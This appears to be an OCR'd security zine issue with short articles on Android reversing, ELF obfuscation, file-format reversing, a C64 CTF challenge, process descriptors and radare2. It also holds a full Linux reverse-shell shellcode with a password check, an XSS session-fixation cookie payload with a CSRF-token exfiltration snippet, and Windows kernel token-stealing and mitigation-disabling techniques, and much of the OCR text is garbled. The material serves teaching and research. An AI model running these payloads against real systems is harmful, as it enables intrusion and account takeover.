Generating a .jar 
Generally, the first thing you would do, is generate 
a .jar, which is just a simple .zip file. Decompiling 
that by hand would be hard because it contains 
the compiled bytecode, thus we use decompilers 
like jdgui or bytecodeviewer. To generate a .jar 
you need the tool dex2jar. You can simply run this 
command and it'll automatically generate it for 
you. 


d2j}-dex2jar.bat <android-app>.apk 


Decompiling the apk 

However, if you want to edit something in the apk 
you need the tool apktool. Run this command and 
a folder will be generated for you with all the 
source code and resources. 


d2j-dex2jar.bat -f <android-app>.apk 
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Opening the .jar 

We won't be looking at the smali files (generated 
with apktool) yet, because it's easier to look (and 
search) for stuff in jdgui or bytecodeviewer. You 
can open it via drag and drop or the menu. 

So where do we actually start? The first thing you 
should do, is opening the search and just look for 
classes which implement interesting stuff. For 


1 Assembly Language used by Android 


Github: github.com/not-matthias 
Twitter: twitter.com/not_matthias 
Blog: not-matthias.github.io 


Android Reverse Engineering 


example, you want to find the web API? Simply 
search for “http”. You want to find the app 
settings? Search for “SharedPreferences”. You 
want to find a special functionality? Just google 
how you would implement it and then search for 
the class. Most of the times, you won’t even need 
to google it, because you can easily guess it. 
Editing 

Once you found the variable or function you can 
simply go to the smali? files and patch it. To do 
that you need to find the path where it's stored. In 
Java there are packages, which are the equivalent 
to folders. If you scroll to the top in jdgui you 
should find the package name. After that, simply 
replace the placeholders and go to the resulting 
path. 


<android-app>/smali/<your- 
package>/<your-class>.smali 


Packing 

Reverse engineering and patching an app is cool, 
but how can we actually install it? 

Building the apk 

To build the decompiled files, you can run this 
command. The built apk will be located 

at <android-app>/dist. 


apktool b <android-app> 


Creating a new certificate 

To be able to install the apk, you need to sign it. 
Luckily there are no certificate checks 
implemented in Android, so we can simply 
generate our own certificate. The program 
keytool.exe is part of the JDK and is located in the 
/bin folder. | recommend adding it to your PATH 
variable, so you don't have to write the entire path 
every time. 


keytool.exe -genkey -keystor 
<keystore-name>.keystore -validity 
1000 -alias <alias> 


Signing the apk 

The last step is simply running this command. Then 
you can install the apk on any Android device. The 
program jarsigner.exe is again included in the JDK. 
jJarsigner.exe -keystor 
name>.keystore -verbos 
app>.apk <alias> 


<keystore- 
<android- 


This article was originally published on not-matthias.github.io 


not-matthias 
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WTFPL Linkedin: https:/ 
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--=[anti-RE for fun]=-- 


In this article, we will go through a couple of techniques to 
guide the reader towards a path to protect their code. One 
of the methods is to obfuscate the code so much that an 
attacker gets confused while trying to reverse engineer 
the binary. In order to correctly obfuscate an ELF binary, 
we need to understand how an attacker does the analysis 
of a binary. Basically, there are two methods of doing it, 
one is Static Analysis which is done without running the 
binary, just by looking at the disassembly and trying to 
figure out what the binary does. The other method is 
Dynamic Analysis in which an attacker runs the binary and 
traces the execution of the process to figure out what the 
binary is doing. 


Static analysis can be made harder by encrypting all the 
strings used inside a binary and also loading the libraries 
dynamically by using dlopen() and dlsym() function calls 
so that the attacker cannot guess the functionality based 
on the PLT table and strings embedded inside the binary. 
One can also use unnecessary jump instructions by using 
goto statements and then add some bogus fake code 
in-between the jump statements to make the control flow 
even more harder to digest. Another method is to encrypt 
the binary and make it decrypt itself during runtime. To do 
this we need to understand the ELF format. For example, 
we have a license_check() function which we want to 
hide, we will force this function to be in a different section 
than the usual .text, then we'll encrypt this new section. A 
decrypting function also needs to be called before we run 
license_check() so that when it is actually called then the 
real decrypted code executes. Once we have both 
encrypting and decrypting functionality then we can do all 
sorts of crazy stuff during runtime. 


Disassembly Of license_check() 
000000000000117f <License_check>: 
Original Encrypted 

push rbp 


Mov rbp,rsp 
sub rsp,0x10 


adc al,0x9 
enter 0x9a4,0xc2 
lods  eax,DWORD PTR ds:[rsi] 


I 

I 

I 
mov QWORD PTR [rbp-0x8 | push rcx 
mov rax,QWORD PTR [rbp | or eax,ecx 
mov rdi,rax | cmp al,Oxb9 
call 8f0 <strlen@plt> | or edx,ecx 
mov rsi,rax | add al,Oxb9 
lea rdi, [rip+0x2b] | or eax,ecx 
mov eax, 0x0 | xchg BYTE PTR [rcx-0x414149e8],ch 
call 920 <printf@plt> | or eax,ecx 
mov eax, 0x0 ] 
leave Laver 
ret | byte 0x82 


#define ENC _ attribute__((section(".whatever"))) 
ENC int license_check(char *str){/* code here */}; 


Now, any function which is defined like above will be 
stored in the .whatever section. This section will only have 
AX(alloc,execute) flags, but in the decrypt function, we 
need to write the decrypted code back to our custom 
section. For that, we need to change its permissions using 
mprotect(). We need the pointer to this section. To find its 
address we need to find the pointer to the list of sections 
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and the pointer to the string table so that we can loop 
through the sections until we find the .whatever section. 


Elf64_Shdr * searchsec(char * section_name, void * d){ 


Elf64_Ehdr * elf_header = ( Elf64_Ehdr * ) d; 
Elf64_Shdr * s_header=(Elf64_Shdr *)(d + elf_header->e_shoff); 
Elf64_Shdr * shstrtab = &s_header[elf_header->e_shstrndx]; 
const char * const strtabptr = d + shstrtab->sh_offset; 
char * name; 
for (int i = 0; i < elf_header->e_shnum; i++){ 

name = (char*) (shstrtab + s_header[i].sh_name); 

if (stremp(name, section_name)==0) return &s_header|il; 


} 
return NULL; 


} 


The function searchsec() will look like this. 


While testing several crypters we found out they 
implemented almost the same thing. See also: 


POCRYPT : https://github.com/picoflamingo/pocrypt 
ELFCRYPT : https://github.com/droberson/ELFcrypt 


Dynamic Analysis of a binary can also be made harder by 
making the control flow obfuscated. A normal control 
flow consists of starting with the main() function, then 
branching out like a tree and eventually coming back to 
the main() function, completing the execution. We can 
make this control flow disorientating by repeatedly calling 
a function again and again with different arguments and 
then jumping from the middle of one function to some 
other function, making the control flow insanely complex. 
One neat trick is shown by Sergey Bratus and Julian 
Bangert in the International Journal of PoC || GTFO 0x00 
where they mutated a binary such that IDA showed a 
different code than the one which actually got executed. 
This was because the tools followed the section table but 
the kernel follows the program header table which can 
setup a completely different address space. This space 
can then be used to execute completely different code. 
The General issue that arises with ELF is the difference in 
parsing the format, this is called a Parser Differential for 
ELF and it means that different programs parse the same 
input slightly differently. When the kernel loads the ELF 
binary, it doesn't use the ElfX_Shdr, it only needs the 
ElfX_Phdr to set up the VMAs. According to this, we can 
say that the following ElfX_Ehdr's fields are kinda useless: 
e_shoff, e_shentsize, e_shnum, e_shstrndx. So, if we 
remove them then the program should still work but 
debuggers will have a hard time dealing with the binary. 


While these techniques sometimes seem too hard to 
crack, it’s actually just a matter of time until someone will 
figure out the protections and break them. 


More info : 


http://phrack.org/issues/58/5.html 
http://shell-storm.org/blog/Linux-process-execution-and-the-usel 


Website : https://www.absOlut3pwn4g3.cf 
Twitter : A SU a Se ole Pwn4g3 


www.linkedin.com/company/absOlut3pwn4g3 
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Reverse Engineering File Format From Scratch 


Usually file structures are vastly documented 
with open-source parsers available, but that's 
not always the case. In this article we will take a 
look at a case study of reverse engineering After 
Effects’ project file - this will serve a dual 
purpose of demonstrating how we can 
understand the file structure of an 
undocumented format and showing that it’s not 
as scary as one may think. Based on the 
acquired knowledge we should be able to build a 
file parser and extract information. 


The first thing | did was opening the file in a hex 
editor to get a general feeling for it, and | also run 
the “file” tool to learn what | could about the file 
format. 


In this example it was revealed to be a big-endian 
RIFF file. While learning more about it | also wanted 
to better understand how these files are used inside 
AE. Since AE is a pretty huge | didn’t wanted to RE 
the binaries just yet and hopefully to skip that 
overall. AE allows us to “Save As > Save a Copy As 
XML” which caught my attention, since it meant the 
file structure can be represented in a more 
human-readable way. It also might have helped me 
make heads or tails of the ASCII strings | saw in the 
hex editor - note the similarities between these two 
files - “swvap”, “head”, “nhed”, etc: 


<svap bdata="072b8e06"/> 

<head bdata="00570001072b8e0680000000000 
eeee100000001"/> 

<nhed bdata="9000000000000005000101001e1 
00200000004e4170872e000000000f FFfFFFe"/> 
<adfr bdata="40e7700000000000"/> 
<CapI><string/></CapI> 


https://www.linkedin.com/in/ido-filus-6783b812b/ 
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Ido Filus 


Noticing this | quickly forgot about researching the 
RIFF file and focused on building a parser for the 
XML (since it looked less scary than the binary data 
in the original .aep files). Using the reference of the 
XML format | learned how single tags, children, 
attributes, arrays etc are represented. When 
building the parser | just made it parse recursively 
until it hit a point it couldn't continue through. Then | 
determined the problem, fixed it, and iterated - and 
quite quickly my parser was able to finish parsing all 
the nodes and data in the file. 


Since the parser could already understand some 
project properties described as XML tags, | 
managed to extract the composition name (which is 
kind of a layers grouping in AE). From there | could 
work on understanding the meaning of certain tags 
and the data they contain - it seemed most of the 
data was found in the bdata attribute in a binary 
format. 


The easiest way to go about it was to start with an 
empty project to minimize the amount of data (and 
export it) and then add layers we know the meaning 
of, and do a diff between the old and new exports. 
Do note that it's also beneficial to use the same 
approach for multiple empty projects to understand 
where variable data (such as timestamp/etc) is 
stored. 


As for the binary data, we can try to parse it in 
different formats such as integers, floats or/and text 
and see what makes the most sense. Once we 
focus on an area in the file, we should be able to 
figure out the “effect” and “settings” of the layer it 
affects. 


We can keep researching the differences and 
guessing the types until we're satisfied we know 
enough. It’s important to also ask yourself how 
would you implement the AE format details - 
perhaps its authors used a similar approach. 
Eventually you can also search the program/process 
memory for strings or data we can see in the 
program's UI itself - it may reveal structures used 
nearby, such as a class instance that represents a 
given type of data. Or even search for the bdata 
value itself and look around its memory area to learn 
more. 


Ido Filus 
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Back to the BASICs 


The theme of Google CTF 2018 Qualification round 
was "history of hacking" - and what better way to 
celebrate it than to make a Commodore 64 
reverse-engineering challenge [1] in pure BASIC? 
Actually, my original idea was to do a 6510 
assembly challenge and so I spent a few of hours 
watching Michal Taszycki's C64 assembly tutorial 
series [2] that I bought some time ago. A couple of 
episodes touched on the internals of C64 BASIC's 
interpreter and, after I heard about the way the 
program was stored in-memory, a couple of ideas 
sprang into my mind. 

So BASIC it was. 

To cut to the chase (and get a bit more technical), a 
typical BASIC program looks like this: 

10 PRINT "HI" 

20 GOTO 10 

And it's stored in memory (and in .prg format) asa 
single-linked list starting at address 0x801: 


Each list node consists of a next pointer (2 bytes 
Little Endian), the line number (yes, that's what 
these prefix numbers are; also 2 bytes LE), and 
then the null-terminated dictionary-compressed 
line content (i.e. BASIC keywords are encoded as 
0x80+keyword_index, where the keyword_index is 
taken from a dictionary hardcoded inside the 
BASIC interpreter [3]). And the list is terminated 
with an additional empty node consisting of only a 
NULL pointer in the next field. 

It has to be noted that storing a program in a linked 
list of lines is pretty unusual for today's standards. 
On the flip side, imagine all the possibilities this 
gives one to mess with players trying to reverse it! 
Let's start with the pretty simple and obvious fact 
that line numbers don't really matter too much. 
True, both Goto and GosuB, and a few other 
commands use them, but apart from jump targets 
most lines can have identical line numbers. If one 
keeps them non-decreasing the program should 
work just fine - not the case for BASIC's "editor", 
but it's OK if we only care about running the code. 
Moving to more interesting things, since the format 


Gynvael Coldwind 
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of the list is pretty simple, it's equally simple to use 
SMC (Self-Modifying Code) techniques (i.e. POKE). 
For instance, the program can - at rest - consist of a 
single line - at least as far as the LIST command is 
concerned. When executed, this line would change 
the next field of the next node from a NULL pointer 
to a proper value, thus allowing the execution to 
continue (the second line should probably "close 
the door", i.e. put the NULL pointer back in place; 
this will break backward jumps though). 

Actually, a more fun way to tackle the problem of 
"break+LIST disclosing the source code that we 
want to hide" is to make a node point back at itself - 
again, at runtime - using SMC: 


$8A0 1990  .. |s00] 
ie $8A0 2000  .. |s00] 
$8AB 2010 ca $00 


Running the LIST command in such case 
results: 


ny aa) a 


And last but not least, being able to use SMC means 
one's also able to encrypt (obfuscate) selected 
nodes, and decrypt (deobfuscate) them at runtime. 
So, how do we do all of this using C64 BASIC 
editor/interpreter? No idea. To create this 
challenge, I had to write my own BASIC "compiler" 
—I called it CrackBASIC because it was made for the 
sole purpose of creating this CrackMe (also, 
because it's BASIC on crack). It has a couple of nice 
features, like being able to calculate node 
addresses of specific lines at compilation time or 
encrypt selected parts of the code. You can check it 
out in the challenge's source directory. 

And that's it! I encourage you to try to solve the 
challenge yourself - there are a few more surprises 
there. 


Gynvael Coldwind 


[1] https://github.com/google/google-ctf/tree/master/ 
2018/quals/re-basics 

[2] https://64bites.com/ 

[3] https://www.c64-wiki.com/wiki/BASIC_ token 


https://twitter.com/gynvael 
https://gynvael.coldwind.pl/ 
https://www.youtube.com/c/GynvaelEN/ 
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eee LL Advertisement 


This is a placeholder ad (since we had an odd number of ads). At the same 
time, it's a great opportunity to explain how ads work in Paged Out! 


First of all, we have two kinds of ads in our zine: 


Community Ads 
These are free to publish, but are restricted to free projects / tutorials / 
tools / etc - basically we want to advertise cool community-made stuff. 


Sponsorship Ads 
These help us cover the costs of making Paged Out! - thank you! 


Secondly, we'll keep the number of ads to a minimum - this means the zine 
will have at most 1 ad page for every 10 articles. 


And that's it. In case you would like to publish a Community Ad, or support 
us with a Sponsorship Ad, please check our the details at: 
https://pagedout.institute/?page=ads.php 
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86 Infection Monkey 


How Resilient Is 
Your Network to 
Advanced Threats? 


Unleash the Infection Monkey in your network 
and discover security flaws in no time. 


The Infection Monkey is an open source Breach and Attack Simulation 
(BAS) tool that assesses the resiliency of private and public cloud 
environments to post-breach attacks and lateral movement. 


www.infectionmonkey.com powered by (P Guardicore GitHub github.com/guardicore/monkey 
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AndroidProjectCreator 


Analysing decompiled Android malware code is a tedious task. 
AndroidProjectCreator aims to improve the effectiveness of this analysis 
by providing you with an easy-to-use toolkit. 


So how does it work? 

AndroidProjectCreator is a command-line application that is written in 
Java and serves as a single interface for numerous tools that are used to 
decode and decompile an APK, such as dex2jar* or JAD-xX*?. After decoding the 
resources and decompiling the code, an Android Studio project is created 
based on the newly obtained data. 


Why an Android Studio project? 

Existing open-source tools provide decompiled code, although there is a 
problem when one wants to remove or refactor code: more often than note, 
tools lack the support of this feature. Android Studio is always up-to- 
date, as it is used to create Android applications. This way, the power of 
the tool is leveraged for a (potentially) unintended purpose. 


A demo 


What better to show people than a wall of text? As is commonly said: “a 
picture is worth a thousand words”. This demo will serve as a picture. 


The used dependencies require the usage of the Java 8 JDK. Simply issuing 
the “-install” parameter to the JAR will start the installation. The 
installation will commence in the directory where the JAR resides, 
regardless of the terminal’s current working directory. 


After the installation is complete, the help menu is shown, together with 
the installation results. To decompile an application, simply call the JAR 
from anywhere on the machine and provide the required parameters: 


java -jar /path/to/AndroidProjectCreator.jar -decompile fernflower 
/samples/sms-stealer.apk ./sms-stealer-fernflower 


The “-decompile” argument specifies the mode in which 
AndroidProjectCreator needs to operate. The “fernflower” decompiler is 
chosen in this case. The APK to decompile is given after that. At last, 
the location where the Android Studio project needs to be placed is 
provided. 


When all is done, one can simply open Android Studio to analyse the code. 
For more information, one can visit the installation and usage guide here’. 
If you have any questions, please message me on Twitter: @LibraAnalysis’. 


https://github.com/pxb1988/dex2jar 
https://github.com/skylot/jadx 


https://maxkersten.nl/projects/androidprojectcreator/ 


BRB WN F 


https://twitter.com/LibraAnalysis 


@LibraAnalysis on Twitter Max 'Libra' Kersten 
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Reverse Shell With Auth For Linux64 


REVERSE SHELL WITH ; 
AUTH FOR LINUX64  §<," 


pop 
This payload will connect back to a xor 


1 - Create a socket 


0x29 ; socket syscall n° 
rax 
rdx, rdx 3; zero out rdx 


remote location over TCP/IPv4 and launch push ie ; 2 means IPv4 
. . . pop r L 
a shell only if a valid password is push Ox®4 ; 41 means TCP 
provided. i 
pop rsi 
syscall 
mov ri5, rax ; save socket in r15 
; 2 - Connect to the target 
mov rdi, rax 
: mov rcx, _TARGET 
The process consists of 5 SESS each not rex’ 3 rcx=127.0.0.1:4444 
one involving one system call: push rcx 
mov rsi, rsp 
1 Create a new socket push 0x10 ; IPv4 address length 
2 Connect to the target address pop rdx 5 
3 Read 8 bytes and check if they match ae nig 3 connect syscall n 
the password syscall 


4 Duplicate each standard stream 


(stdin, stdout and stderr) into the ; 3 - Read password from client 


socket, allowing the target to send read_pass: 
and receive messages xor rax, rax ; read syscall (0) 
5 Execute a shell mov rdi, ri5 ; rdi = socket fd 
push 0x08 
"How do I make a syscall?" you may ask. a8 a Tha eae une) 
Place the syscall number into RAX mov rst, rsp 3; rst -> buffer 
Parameters go into: syscall 
RDI,RSI,RDX,R10,R8,R9 and the stack 3 Check password 
Use the syscall instruction and... mov rax, _PASS 
letthe k 1 do th iy mov rdi, rsi 
e e kernel do the magic! scasq 3; Compares rax vs rdi 


jne read_pass 
Configs for the payload: 
; 4 - Duplicate streams 2,1 and 0 
mov rdi, ri5 ; rdi=socket fd 
push 0x02 ; 2 == stderr 

pop rsi 


_TARGET: Oxfeffff80a3eef ffd 
To get this number: 


1 IP to hex 127.0.0.1 -> Ox7f000001 loop_through_stdfds: 
2 Port to hex 4444 -> 0x115c push 0x21 Fi dup2 syscall n° 
3 Constant for IPv4 IPv4 -> 0x0002 pop rax 
4 Put it all together 0x0100007f5c110002 syscall 
dec rst 3 next stream 


(notice how IP and port endianness 
change! ) 
5 Extra step: As the original value has 


jns loop_through_stdfds 
; 5 - Execve("/bin/sh") 


null bytes, it was replaced with its xor rdx, rdx 
one's complement. push rdx 
0x0100007f5c110002->0xfeffff80a3eefffd ; echo -n '//bin/sh' | rev | xxd 
mov rbx, 0x68732f6e69622f2T 
_PASS: 0x214e49454d54454c gee rep 
Hex Little-endian for "LETMEIN!" push rdx. 
(echo -n 'LETMEIN!' | rev | xxd) mov rdx, rsp 
ones push rdi 
The code provided favors readability instead of size moy rsi, rsp 
or speed. Many improvements can be done to it. push 0x3b ; execve syscall n° 
| leave that exercise to the reader. pop rax 
Happy hacking!! syscall 
Alan Vivona @syscall59 


medium.syscall59.com 
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On escalating your 
bug bounty findings 


Based on publicly-disclosed bug bounty reports, techni- 
cal quirks, such as the ones listed in the HTTP cookies 
RFC!, are rarely being used to escalate popular attack 
vectors like cross-site scripting (XSS). The lack of exploring 
issues further could be a result of the competitiveness of 
bug bounty programs, where bug bounty hunters attempt 
to submit reports immediately upon discovery of a poten- 
tial problem. Another cause may be the lack of bug bounty 
programs rewarding reporters based on the impact of the 
reported vulnerability. In this short paper, we want to 
cover two noteworthy reports where we combined further 
issues to demonstrate the impact of the vulnerability. The 
goal here is to encourage readers to toy around with their 
findings and incorporate further minor issues into their 
proof of concepts to illustrate the impact of their findings. 


Session fixation on Shopify enabling account 
takeover 


As Shopify’s security policy states, cross-site scripting on 
*.shopifycloud.com and *.shopifyapps.com is out of 
scope because both of these hosts are littered with XSS. 
In other words, cross-site scripting on those hosts would 
be considered an invalid finding?. 

Upon discovering an XSS flaw in Shopify’s SDK, 
Filedescriptor found that specific Shopify-built applications 
used signed sessions or session identifiers. This discovery 
led to Filedescriptor noticing that where session identifiers 
were used, the applications were not generating fresh iden- 
tifiers on login. To put it another way, these applications 
were linking whatever session identifier was present in the 
cookie header upon sign in with the authenticated user. 
This is known as Session Fixation and anybody that runs 
a bug bounty program has almost certainly seen this type 
of behaviour reported as is without the reporter chaining 
the issue with other findings to demonstrate exploitability. 

As a result of this Session Fixation in certain appli- 
cations belonging to Shopify, Filedescriptor was able to 
leverage an XSS flaw in an out-of-scope asset to affect 
www.shopify.com itself. A hypothetical attack scenario 
could take place as follows. 


e An adversary visits the application where they en- 
countered the Session Fixation and takes note of the 
session identifier the application assigns to them; 

e The attacker uses the X55 on *.shopifycloud.com 
and sets a cookie on behalf of the victim, scoped to 
all of Shopify’s subdomains. 


document .cookie='_flow_session=EVIL;domain= 
.shopifycloud.com;path=/'; 


lhttps: //tools.ietf.org/html/rfc2965 
https: //hackerone.com/shopify 
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e Attacker forces the victim to log in _ to 
https://www.shopify.com/admin/apps/flow, 
which redirects to vic- 


tim.shopify.com/admin/apps/flow and then triggers 
the login flow; 

e Finally, the attacker can use the original session iden- 
tifier to authenticate as the victim. 


Combining minor issues with an unauthenticated 
reflected XSS to gain access to authenticated func- 
tionality 


While collaborating with Alessandro De Micheli *, a very 
basic unauthenticated reflected cross-site scripting flaw 
was discovered on a private program where based on past 
experiences, the reporters knew this private bug bounty 
program incorporate the impact into the bounty amount. 
To escalate the issue further and gain access to authenti- 
cated functionality, Alessandro and Edwin examined the 
main application looking for any minor flaws that could 
be leveraged. This was when they stumbled across an 
endpoint with the following HTTP response (modified for 
brevity): 


HTTP/1.1 200 OK 
Access-Control-Allow-Origin: * 
x-csrf-jwt: eyAAAAAAAAAA... 


With a simple AJAX call, it was possible to retrieve the 
x-csrf-jwt token. 


$.ajax({ 
type: ‘GET', 
url: 'https://example.com/endpoint', 
success: function(data, status, r){ 
alert (r.getResponseHeader('x-csrf-jwt')); 
}, 
error: function (r, status, error){ 
alert (r.getResponseHeader('x-csrf-jwt')); 
} 
a3 


Further, the settings panel of users’ on the target ap- 
plication had a feature which allowed people to export 
all their user data and history — similar to the “GDPR” 
features you might see on Uber. By using the exfiltrated 
x-csrf-jwt token, the fact that the login panel was frame- 
able, the “GDPR” export function, and the XSS vulnera- 
bility, Alessandro and Edwin would have been able to leak 
authenticated data from an unsuspecting user. 

The fully-fledged exploit is too long to include in this 
paper, so a summary of the code is listed below. 


e Create iframe of login panel; 

e AJAX call to exfiltrate x-csrf-jwt token and initiate 
download using token; 

e Wait for 200 OK status code from /export endpoint 
and fetch exported ZIP from user’s /download end- 
point. 


3https: //hackerone.com/europa 


Edwin "EdOverflow" Foudil 
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Fun with process 
descriptors 


Besides the early version of MS-DOS (1.x-2.x), the 
first versions of UNIX, Mac, and AmigaOS were de- 
signed as multitasking operating systems [1]. The basic 
primitive which allows this design was a process. We 
understand that a process is a program in execution. 
Processes are identified by unique numbers called PIDs. 
After 40 years, this fundamental abstraction is still used 
by all modern operating systems. 

The design of operating systems is constantly evolv- 
ing, and with time it turned out that the ordinary de- 
sign of processes has some downsides. First is the race 
condition while we try to destroy (kill) a process. As 
mentioned before, the process is identified by a single 
number (PID). When we use pkill(1), we are providing a 
name of the executable we want to kill. The application 
has to create a list of processes and their corresponding 
PIDs. pkill will send the signal (SIGTERM) to destroy 
the process to all PIDs matching the sought phrase. The 
race condition occurs while we are going through the list 
of executables. After we have created the list; the pro- 
cess may disspear and the PID may be reused. In such 
a situation, a signal will be sent to the recently created 
process, which may have a different name/executable. 

By default the maximum PID value is 32,768 on 
Linux! and 99,999 on FreeBSD?. If this number is hit 
the counter starts using the lowest of the unused PIDs. 
In an environment with a lot of processes being spawned, 
the probability of a short-term PID reuse is significant. 
It is also worth mentioning that some configurations use 
randomised PIDs for discussable security benefit?. 

Another interesting problem with this design is that 
it’s not friendly for libraries. Right now if our library 
would like to create a new process, the application using 
it must be aware of such behavior. The point is, that if 
the application uses the wait(2) syscall*, it may receive 
the signal from a process created by the library. If a pro- 
gram is not prepared for that it can crash in unexpected 
and random ways. 

An interesting question is: should libraries behave in 
such an “unexpected” way and spawn new child pro- 
cesses? Is it a bad design? Not necessarily. If libraries 
try to secure themselves through privilege separation or 
using capabilities systems (like Capsicum) it can be use- 
ful. The same goes for optimisation. If libraries are try- 
ing to use multithreading for optimising purposes should 
the main program be aware of that? 

For those two reasons, in 2010 we developed a new 


It can be read from /proc/sys/kernel/pid_max. It can be in- 
creased up to 2?? on 64-bit Linux. 

It can be read and decreased using kern.max_pid. 

Shttps://www.whitewinterwolf .com/posts/2015/05/23/ 
do-randomized-pids-bring-more-security/ 

4wait(2) and wait2(2) are used to wait for a status change of 
all child processes. The same goes for wait4(2) and waitpid(2) 
with -1 argument as wpid. 
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concept for processes called ”process descriptors”® in 
FreeBSD [2]. Instead of using a fork(2) syscall we can 
use a pdfork(2) syscall to spawn a new process. This 
syscall will return a handler called a process descrip- 
tor, which corresponds to the descriptor table - filedesc 
structure in FreeBSD kernel. Process descriptors behave 
like other descriptors (files, sockets, pipes etc), we can 
duplicate them (dup(2)), send them to other processes 
(via UNIX domain sockets), and close them (close(2)). 

If there exists at least one process descriptor, the 
structures representing the process in kernel cannot be 
removed even if the process exited. Thanks to that we 
can check the status of a process even after it has ex- 
ited - solving the pkill(1) problem. Right now the only 
proper way to fetch the status of the process is through 
using kqueue(2). The pdfork(2)’ed process will not send 
SIGCHILDs to the parent process even if the parent pro- 
cess is wait(2)ing for all processes. When all of the pro- 
cess descriptors are closed, the process is terminated®. 

In the Linux world there have also been attempt to 
create process descriptors by adding an additional flag 
- CLONE_FD - to the clone(2) syscall, which is used to 
spawn a new process in this kernel. The initial work was 
started in 2015 by Josh Triplett, but never landed in the 
Linux kernel [3]. Recently Linux developer introduced 
a new flag - CLONE_PIDFD - which allows that [4]. 
However, in v5.2 Linux kernel tag the only reliable way 
to access procfs process information (/proc/<pid>/) 
through PIDFD is to open the directory via process’ 
PID and validate if the process is still running by send- 
ing a signal to it via PIDFD. There are some proposals 
to use pidfd_open to simplify this process [5]. 

The process descriptors give a reliable handle to the 
process. Through introducing this concept, we enable 
libraries to spawn new processes transparently to the 
application and prevent race conditions when signalling 
or managing the process In today’s world with high per- 
formance and short living processes it is unacceptable 
to have an unreliable interface to handle processes. It 
would be interesting to see this concept incorporated 
more widely. 
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5It is worth noting that in the Linux kernel world the ” Process 
Descriptors” also refer to the task_struct structure, which contains 
all the information about the single process. Here we stick to the 
userland process descriptors. 

6This behavior may be changed by passing PD.DAEMON flag 
to the pdfork(2) syscall. 
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Bruno Gongalves de Oliveira (mphx2) 


While exploiting the Windows kernel, there are multiple 
objects that an attacker can interact with to gain 
privileges in userspace. Since the kernel is the base for 
everything running in userland, all characteristics from 
those objects can be compromised. One interesting 
object that enables this type of exploitation is the 
EPROCESS. This type of object is created in kernel 
space for any process started in userspace. This object 
carries around all the elements belonging to a given 
process including its security elements. This article 
describes three of the elements that can be utilized for 
exploitation purposes: Token, MitigationFlags* and 
Protection. 

Token is a pointer that indicates the ACLs (Access 
Control Lists) that are being used by the process, so if it 
is possible to modify this element using any kernel 
vulnerability (such as with write > what > where 
exploitation primitives) it would be feasible to change the 
process privileges. For example, replacing an 
unprivileged token from an existing process such as 
cmd.exe with a SYSTEM token, so every command that 
is run within this cmd.exe process, would run as 
SYSTEM - an administrator / high-privilege account. 

The offset for the token in Windows 10 is 0x358 (so far), 
so the EPROCESS address+0x358 will refer to the 
pointer for the token in the specific process. As shown 
below, the Token is a pointer to a structure that will have 
all the ACLs in place for the process. 


lkd> dt _EPROCESS ffff8e838cd22080 Token 
nt! EPROCESS 

+0x358 Token : _EX FAST REF 
lkd> dq f£ff£8e838cd22080+0x358 
fEEL8e83° 8cd223d8 fFf£c503 ef75997b 
00000000° 00000000 


In a different situation, it is also possible to lower the 
privileges of a process and then being able to reach with 
an unprivileged account (for example on the Isass.exe) 
(1). It is also possible to edit the ACLs in the token but 
that will not be covered here. This method could be 
useful if the attacker does not want to raise suspicion 
due to an active process with elevated privileges. 

Also in Windows 10, there are another two elements not 
as popular as the Token but interesting as well: the 
MitigationFlags(+0x828) and MitigationFlags2(+0x82c). 
This becomes handy when administrative privileges are 
not enough, for example, while escaping a sandbox 


twitter.com/mphx2 
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application, these flags could be modified for disabling 
security protections from the application such as ACG, 
CIG, CFG and others (2). 


lkd> dx -id 0,0,ffff8e8390eea580 -rl 
(*((ntkrnimp! EPROCESS 

*) Oxf£ff£F8e838cd22080) ) .MitigationFlagsValu 
es 

<redacted> 

+0x000 ( 0: 0) 
ControlFlowGuardEnabled : 0x1 [Type: 
unsigned long] 
+0x000 ( 1: 1) 
ControlFlowGuardExportSuppressionEnabled : 


Ox0 [Type: 
+0x000 ( 2: 2) 
<redacted> 


Disabling these protections would allow the attacker to 
extend the attack: allocating RWX memory pages or 
disabling the ROP protection for further exploitation. 
Another resource on EPROCESS that can be useful for 
exploitation is the Protection, offset +Ox6ca. This flag 
sets the Integrity from the process and enables the 
Protected Process Light (PPL) protection. This element 
protects the process’ handles against any loading or 
modification even under the same Token (3). 


lkd> dx -id 0,0,ffff9b85b644c080 =r 
(*((ntkrnimp! PS PROTECTION 
*)Oxfff£F9bD85b5ec5c4a) ) 
(*((ntkrnimp! PS PROTECTION 
*)OxfffFF9b85b5ec5c4a) ) 


[Type: _PS PROTECTION] 
+0x000] Level : Ox6l 
[Type: unsigned char] 


+0x000 ( 2: O) Type 
Oxl [Type: unsigned char] 
+0x000 ( 3: 3) Audit 
0x0 [Type: unsigned char] 
+0x000 ( 7: 4) 
Ox6 [Type: 


Signer 


unsigned char] 


These protections can be disabled by setting this byte as 
null (0x0). This flag also limits the process’ debugging, 
since it prevents to be handled by any other process, so 
disabling it will allow this interaction as well. 
References: 
[1]httos://media.blackhat.com/bh-us-12/Briefin rrudo 
BH US 12 Cerrudo Windows Kernel_WP.pdf 
[2]httos://2017.zeronights.org/wp-content 
als/Abusing%20GD1%20for%20ring0%20exploit%20prim 
0, 0 j 


oe 20-5420Evol 
[3]http://www.alex-ionescu.com/?p=97 
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MOV your Exploit Development Workflow to [r2land] 


MOV your Exploit Development Workflow to [r2land] 
[Intro ]> 


checksec.sh, metasploit’s pattern_create & pattern_offset, file, readelf, ropgadget, gdb-peda...if you want 
to reduce the amount of tools for your exploit development workflow - move to the radare2 framework. 


[Executable File Information ]> 


/ File and security attributes il 


\ Checksec 


/ Show entry point 

| Show imports 

| Show exports 

| Show strings 

| Get address of func@plt 
\ Get address of func@got 
/ 
\ 


Show sections 
Grep section permissions 


[Debugging/Analysis ]> 


/ Debug binary 

| Debug binary without ASLR 
| Follow fork mode 

| Enter Visual Mode 

| Continue, Step, Step over 
\ Backtrace 

/ 


Auto analysis of binary 
| Print disassembly 
\ Print xrefs to address 


[Memory Analysis ]> 


Search for string 
Search for hex 
Search for asm instructions 


Memory telescoping 
Register telescoping 


Show memory maps 
Show map of heap 
List loaded modules 


a_—-—_—™ a_—-— == SS 


[Exploitation ]> 


Print de-bruijn pattern 
Get offset from pattern 
Get offset from IP 


Search for ROP gadgets 
Display ROP gadgets linear 
Show ROP options 

Set max instructions/gadget 


Assemble asm instructions 
Disassemble opcodes 
Generate shellcode 


/ 
| 
\ 
/ 
| 
| 
\ 
/ 
| 
\ 
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i~pic, canary,nx,crypto,stripped,static,relocs 


ieq 

ii 

iE 

UZ 

